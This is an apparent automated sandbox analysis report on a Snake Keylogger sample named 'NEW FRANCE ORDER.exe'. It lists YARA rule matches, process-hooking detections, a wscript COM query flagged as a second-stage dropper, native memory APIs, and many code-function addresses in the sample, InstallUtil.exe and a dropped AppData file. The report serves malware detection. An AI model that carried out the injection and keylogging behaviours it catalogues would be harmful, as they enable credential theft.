Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: NEW FRANCE ORDER.exe
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDA0B8 NtProtectVirtualMemory, 0_2_05DDA0B8
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDD3A0 NtResumeThread, 0_2_05DDD3A0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDA0B2 NtProtectVirtualMemory, 0_2_05DDA0B2
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDD398 NtResumeThread, 0_2_05DDD398
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05908AA8 NtProtectVirtualMemory, 10_2_05908AA8
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0590C260 NtResumeThread, 10_2_0590C260
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05908AA1 NtProtectVirtualMemory, 10_2_05908AA1
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0590C25B NtResumeThread, 10_2_0590C25B
Detected potential crypto function
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065A0040 0_2_065A0040
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065A0014 0_2_065A0014
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_016C9830 0_2_016C9830
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_016C59C0 0_2_016C59C0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_016C59B1 0_2_016C59B1
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_016CFB00 0_2_016CFB00
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_016C5F41 0_2_016C5F41
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_016C5F50 0_2_016C5F50
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DD6848 0_2_05DD6848
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDB840 0_2_05DDB840
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DD6838 0_2_05DD6838
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDB830 0_2_05DDB830
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A31A0 0_2_064A31A0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A457A 0_2_064A457A
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A4588 0_2_064A4588
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064AAA48 0_2_064AAA48
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064AAA38 0_2_064AAA38
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A3140 0_2_064A3140
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A11C8 0_2_064A11C8
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A11B9 0_2_064A11B9
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065EB540 0_2_065EB540
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E6E4A 0_2_065E6E4A
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E9751 0_2_065E9751
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E9760 0_2_065E9760
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E721E 0_2_065E721E
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E7220 0_2_065E7220
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E7220 0_2_065E7220
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E0040 0_2_065E0040
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E0006 0_2_065E0006
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E8170 0_2_065E8170
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E8160 0_2_065E8160
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065FE740 0_2_065FE740
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065F2C98 0_2_065F2C98
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065FE732 0_2_065FE732
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065F5117 0_2_065F5117
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065F2C8A 0_2_065F2C8A
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0660D018 0_2_0660D018
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06667420 0_2_06667420
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06660D4A 0_2_06660D4A
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666DB70 0_2_0666DB70
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666A6D2 0_2_0666A6D2
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666A6D8 0_2_0666A6D8
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06667410 0_2_06667410
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666741E 0_2_0666741E
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06667419 0_2_06667419
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06660040 0_2_06660040
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06660022 0_2_06660022
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666F168 0_2_0666F168
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666DE97 0_2_0666DE97
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_066699F1 0_2_066699F1
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0698EA08 0_2_0698EA08
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06970006 0_2_06970006
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06970040 0_2_06970040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_01502AF4 7_2_01502AF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0150E30C 7_2_0150E30C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_01501040 7_2_01501040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_01501030 7_2_01501030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_015034B0 7_2_015034B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_01987118 7_2_01987118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198C146 7_2_0198C146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198A088 7_2_0198A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_01985360 7_2_01985360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198D278 7_2_0198D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198C468 7_2_0198C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198C738 7_2_0198C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198E988 7_2_0198E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_019869A0 7_2_019869A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_019829E0 7_2_019829E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198CA08 7_2_0198CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198CCD8 7_2_0198CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198CFAA 7_2_0198CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_01983E09 7_2_01983E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198E97A 7_2_0198E97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_0198FAC1 7_2_0198FAC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E391B0 7_2_05E391B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E37E90 7_2_05E37E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E30DE1 7_2_05E30DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E32DE0 7_2_05E32DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E30DF0 7_2_05E30DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E32DD1 7_2_05E32DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E391A0 7_2_05E391A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E365A8 7_2_05E365A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3C180 7_2_05E3C180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3A988 7_2_05E3A988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E36599 7_2_05E36599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E34D98 7_2_05E34D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3A998 7_2_05E3A998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E30960 7_2_05E30960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3D968 7_2_05E3D968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3C17B 7_2_05E3C17B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E32940 7_2_05E32940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3F14E 7_2_05E3F14E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E32950 7_2_05E32950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3F150 7_2_05E3F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E30950 7_2_05E30950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3D95B 7_2_05E3D95B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E34908 7_2_05E34908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E38CE8 7_2_05E38CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E348FB 7_2_05E348FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E324C0 7_2_05E324C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E304C0 7_2_05E304C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3A4C0 7_2_05E3A4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E304D0 7_2_05E304D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3A4D0 7_2_05E3A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E38CD8 7_2_05E38CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3D4A0 7_2_05E3D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3BCB3 7_2_05E3BCB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E324B0 7_2_05E324B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3BCB8 7_2_05E3BCB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3EC88 7_2_05E3EC88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3D490 7_2_05E3D490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E34468 7_2_05E34468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3EC79 7_2_05E3EC79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E34478 7_2_05E34478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E30040 7_2_05E30040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E38820 7_2_05E38820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E32020 7_2_05E32020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E32030 7_2_05E32030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E30007 7_2_05E30007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3A008 7_2_05E3A008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3880F 7_2_05E3880F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3001F 7_2_05E3001F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3B7E5 7_2_05E3B7E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E33FE8 7_2_05E33FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E377E8 7_2_05E377E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3B7F0 7_2_05E3B7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E39FF7 7_2_05E39FF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3E7C0 7_2_05E3E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E35FC8 7_2_05E35FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3CFC8 7_2_05E3CFC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E35FD8 7_2_05E35FD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3CFD8 7_2_05E3CFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E33FD8 7_2_05E33FD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E377D8 7_2_05E377D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E31BA0 7_2_05E31BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3E7B0 7_2_05E3E7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E31B91 7_2_05E31B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E39B40 7_2_05E39B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E38347 7_2_05E38347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E33B49 7_2_05E33B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E35B48 7_2_05E35B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E37348 7_2_05E37348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E33B58 7_2_05E33B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E37358 7_2_05E37358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E38358 7_2_05E38358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3B328 7_2_05E3B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E39B31 7_2_05E39B31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E31700 7_2_05E31700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3CB00 7_2_05E3CB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E31710 7_2_05E31710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3CB10 7_2_05E3CB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3B318 7_2_05E3B318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3FAE0 7_2_05E3FAE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3E2EB 7_2_05E3E2EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3E2F8 7_2_05E3E2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E336C8 7_2_05E336C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E36EC8 7_2_05E36EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3FACF 7_2_05E3FACF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E36EB9 7_2_05E36EB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E356B8 7_2_05E356B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E336B8 7_2_05E336B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E31280 7_2_05E31280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E37E8D 7_2_05E37E8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E33261 7_2_05E33261
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3AE60 7_2_05E3AE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E39668 7_2_05E39668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E31271 7_2_05E31271
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E33270 7_2_05E33270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E39678 7_2_05E39678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3C648 7_2_05E3C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3AE51 7_2_05E3AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3DE20 7_2_05E3DE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E36A29 7_2_05E36A29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E35228 7_2_05E35228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3DE30 7_2_05E3DE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3C637 7_2_05E3C637
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E36A38 7_2_05E36A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3F609 7_2_05E3F609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_05E3F618 7_2_05E3F618
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_014A9830 10_2_014A9830
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_014A59C0 10_2_014A59C0
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_014A59B1 10_2_014A59B1
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_014AFB00 10_2_014AFB00
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_014A5F41 10_2_014A5F41
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_014A5F50 10_2_014A5F50
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05909E30 10_2_05909E30
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05905238 10_2_05905238
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05909E20 10_2_05909E20
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05900016 10_2_05900016
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05905228 10_2_05905228
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FE31A0 10_2_05FE31A0
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FE4588 10_2_05FE4588
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FE457B 10_2_05FE457B
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FE11C8 10_2_05FE11C8
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FE11B9 10_2_05FE11B9
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FE3193 10_2_05FE3193
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FE3140 10_2_05FE3140
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FEAA48 10_2_05FEAA48
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FEAA38 10_2_05FEAA38
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_060E0006 10_2_060E0006
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_060E0040 10_2_060E0040
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0612B540 10_2_0612B540
